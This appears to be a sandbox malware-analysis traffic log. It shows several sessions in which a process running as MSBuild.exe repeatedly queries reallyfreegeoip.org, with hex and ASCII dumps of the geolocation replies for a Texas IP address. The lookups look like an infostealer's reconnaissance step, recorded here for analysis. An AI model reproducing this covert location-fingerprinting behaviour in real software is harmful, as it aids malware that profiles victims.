2024-11-06 16:02:51 UTC	1219	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:51 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 38162 Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fk%2FNonWHqlbrhHK3XfQ3UIQL956N2xFvKumrfOLE9%2FPXMIxPK0Lhe5JnCJJvKcJMfVJVvX8DJRqQrsKf8lRpmnexGQFndKTnZ6o9wAzxN%2BHomvx6goLFutmm3ltYE%2FqM39AcKGQR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f6d7efbeaee-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1377&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2329847&cwnd=251&unsent_bytes=0&cid=3a4819330db548ba&ts=165&x=0"
2024-11-06 16:02:51 UTC	150	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
2024-11-06 16:02:51 UTC	209	IN	Data Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	56880	188.114.96.3	443	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:52 UTC	63	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-06 16:02:52 UTC	1213	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:52 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 38163 Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N1QzEvocrtzFS8FLvXJdLY6loIc658INlZAAiHv0Cq8ihs1fxlPKYDDDQMr5gt76ZB1hQLKF43Wx3g4lT0q7WltJi8nezGtW7njzBEE6JZlS6%2BojEjh7lj2BzCazyVQJUtbXR3Ma"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f77cae86c10-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1115&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2549295&cwnd=251&unsent_bytes=0&cid=def75cd627a024bb&ts=188&x=0"
2024-11-06 16:02:52 UTC	156	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas
2024-11-06 16:02:52 UTC	203	IN	Data Raw: 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: </RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	56886	188.114.96.3	443	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:53 UTC	87	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-06 16:02:54 UTC	1217	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:54 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 68d8c802-f830-4d99-b22d-aa66a416d868 x-amzn-trace-id: Root=1-672b818e-3fe698b34e09e04b5ebcaf79;Parent=0b99835eeee52a0d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 f923e65cfb5d73f11ea9a89d42fad5fc.cloudfront.net (CloudFront) x-amz-cf-pop: DEN52-C1 x-amz-cf-id: VAMjkjwUr0TN8uZkoUg74pQ78zDtUU3uyR1s9VYeqs4wXz8gbpFGsw== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4512 Last-Modified: Wed, 06 Nov 2024 14:47:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2NeoJH8w3yol%2FKhdvFI1XIphQQ6FF2w1wT8XGFhqrebg1TTm9B0cqqQZxpRnRv1RmMzF%2Fd7A%2BIHqZSK8As9vrd6dU4aosKb8F%2Bbr5R1KIrSL2Fbloi1LhGnoupqFaROIIIKcfQl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f802df1e769-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19058&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=152742&cwnd=32&unsent_bytes=0&cid=956f5e6fe70d32a0&ts=458&x=0"
2024-11-06 16:02:54 UTC	152	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
2024-11-06 16:02:54 UTC	207	IN	Data Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	56891	188.114.96.3	443	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:54 UTC	63	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-06 16:02:54 UTC	1219	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:54 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 38165 Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lYd2fTDPOd0rQEdOOftOrqwnfyW9Myfm6bhtYzRq9EZuusMBIyCs5A7n2NAgzcRg2jeU2Un4luQyX%2BjWveM%2BA0wTecqyxj52FYiINy1NSdVl5uFAV7Flvc%2Bu%2F9EGgez9Xa0XmLcp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f842bd86b82-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1794&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1583378&cwnd=251&unsent_bytes=0&cid=9e57791ae0574912&ts=164&x=0"
2024-11-06 16:02:54 UTC	150	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
2024-11-06 16:02:54 UTC	209	IN	Data Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	56898	188.114.96.3	443	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:55 UTC	87	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-06 16:02:55 UTC	1219	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:55 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 38166 Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8VV06aCY%2BcHhde0kCy9OT0i%2FWmfwrT4UpgAcjSCZ7nkUq2lAzEOs7iC6Zm6RzuffeBVkefDgGVw2Zb6MN2JUEA7ZKA4LoCGc6RIAoa%2FvhCFg5EiLLvUsHRsmWrZYP2MZhiT5%2BdYH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f8a2db46b7c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1095&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2567375&cwnd=247&unsent_bytes=0&cid=01af1006541b7188&ts=172&x=0"
2024-11-06 16:02:55 UTC	150	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
2024-11-06 16:02:55 UTC	209	IN	Data Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	56904	188.114.96.3	443	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:56 UTC	87	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-06 16:02:56 UTC	1221	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:56 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 68d8c802-f830-4d99-b22d-aa66a416d868 x-amzn-trace-id: Root=1-672b818e-3fe698b34e09e04b5ebcaf79;Parent=0b99835eeee52a0d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 f923e65cfb5d73f11ea9a89d42fad5fc.cloudfront.net (CloudFront) x-amz-cf-pop: DEN52-C1 x-amz-cf-id: VAMjkjwUr0TN8uZkoUg74pQ78zDtUU3uyR1s9VYeqs4wXz8gbpFGsw== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4514 Last-Modified: Wed, 06 Nov 2024 14:47:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=03hE%2Fgf0R6pDhTeVgL9HCbEmdJmR5xwDpZwcqyZxWbPbTLTxtgSFnAOIId3hcLk2kLH33rjirIPKum5o7rutglHW4Kb56jO%2BumlEHfVs6%2BD%2FQXd4aG7kKK19%2F2eLoSRmLJxB%2BKjY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f8e9e66e763-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18726&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=153788&cwnd=32&unsent_bytes=0&cid=3ba9a45b40742297&ts=167&x=0"
2024-11-06 16:02:56 UTC	148	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
2024-11-06 16:02:56 UTC	211	IN	Data Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	56911	188.114.96.3	443	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:57 UTC	87	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-06 16:02:57 UTC	1215	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:57 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 38168 Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NevTZt1yIl5pQiU%2FxIwRWtoFBjRp4HW2QtYVh4EgQMd%2BdurgbJcPxXFucJrvBDbxJgXrvXz8TtvKwriS8SvmlrcZx3rdJYfcm1DJ5VlFcxiTIFl66bkhl8foKjfPuIhHimdZWeFy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f964bab6b13-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1209&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2450084&cwnd=251&unsent_bytes=0&cid=50bef6b582323d09&ts=450&x=0"
2024-11-06 16:02:57 UTC	154	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
2024-11-06 16:02:57 UTC	205	IN	Data Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	56914	188.114.96.3	443	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:58 UTC	63	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org
